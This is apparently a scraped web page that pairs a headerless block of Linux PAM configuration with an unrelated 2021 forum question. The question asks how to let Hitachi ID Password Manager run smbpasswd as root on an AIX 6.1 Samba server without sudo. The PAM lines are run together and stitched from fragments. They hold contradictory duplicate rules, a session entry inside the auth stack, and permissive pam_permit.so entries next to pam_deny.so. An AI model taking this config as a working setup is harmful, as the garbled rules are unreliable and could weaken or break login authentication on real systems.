session [default=1]                     pam_permit.so  session required        pam_unix.so  session optional                        pam_ldap.so  session     required      pam_mkhomedir.so skel=/etc/skel umask=0022  session     required      pam_limits.so  session     required      pam_unix.so  session     optional      pam_ldap.so  

pam common-auth

auth    [success=1 default=ignore]      pam_ldap.so  auth    required                        pam_unix.so nullok_secure use_first_pass  auth    required                        pam_permit.so  session     required      pam_mkhomedir.so skel=/etc/skel umask=0022 silent  auth    sufficient      pam_unix.so nullok_secure use_first_pass  auth    requisite       pam_succeed_if.so uid >= 1000 quiet  auth    sufficient      pam_ldap.so use_first_pass  auth    required        pam_deny.so  

pam common-account

account [success=2 new_authtok_reqd=done default=ignore]        pam_ldap.so  account [success=1 default=ignore]      pam_unix.so  account     required      pam_unix.so  account     sufficient    pam_succeed_if.so uid < 1000 quiet  account     [default=bad success=ok user_unknown=ignore] pam_ldap.so  account     required      pam_permit.so  account sufficient        pam_ldap.so  account sufficient      pam_unix.so  

How to run smbpasswd as root on AIX?

Posted: 13 Dec 2021 02:05 AM PST

I have Hitachi ID Password Manager (formerly p-synch) set up to change the password on (among other systems) an aix 6.1 server running samba. p-synch has the capability of executing additional commands by configuring "chat script" in the conf file. But p-sync does not send the old password and runs the script as the "p-sync admin ID".

Only root can change the samba password without the old password. I could get around this problem with sudo, but it is not currently installed on the aix system, and I want to make sure that sudo is the only option before installing and configuring it.

Any suggestions?

No comments:

Post a Comment